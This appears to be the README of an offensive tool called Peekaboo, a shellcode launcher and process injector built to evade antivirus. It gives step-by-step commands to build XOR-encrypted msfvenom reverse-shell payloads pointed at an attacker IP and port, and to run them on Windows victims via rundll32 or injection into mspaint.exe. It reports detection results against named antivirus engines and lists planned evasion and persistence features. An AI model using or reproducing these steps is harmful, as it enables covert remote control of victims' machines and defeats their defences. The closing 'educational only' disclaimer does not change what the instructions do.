Peekaboo
Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
Main logic
XOR encryption and decryption for functions call and main payload - msfvenom
reverse shell as example.
Usage
1. DLL
on attacker machine
check your IP:
ip a
run python script with flags:
python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1
then on victim machine (windows 10 x64):
run on powershell or cmd promt:
rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy
check on attacker machine:
check your netcat listener:
2.Injector
on attacker machine:
check attacker ip:
ip a
run python script on linux (for example process mspaint.exe
):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2
then on victim machine run (windows 10 x64):
.\peekaboo.exe
or click (if -m windows
param)
check on attacker machine:
check your netcat listener:
3. NT API injector
run python script on linux (for example process mspaint.exe
):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3
then on victim machine (windows 10 x64):
.\peekaboo.exe
Issues.
Tested on:
- Attacker machines: Kali linux 2020.1, Windows 10 x64
- Victim machine: Windows 7 x64, Windows 10 x64
- Payload: windows x64 reverse shell from msfvenom
- AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus
virus total result:
02 september 2021
30 december 2021 (NT API injector)
antiscan.me result:
11 january 2022 (NT API injector)
https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9
TODO
- Compile injector in Kali linux
- XOR + AES aes branch
- Calling Windows API functions by hash names
- Find Kernel32 base via asm style
- One python builder
- Anti-VM tricks
- Persistence via Windows Registry run keys
- Replace msfvenom shell to donut payload???
Attention
This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause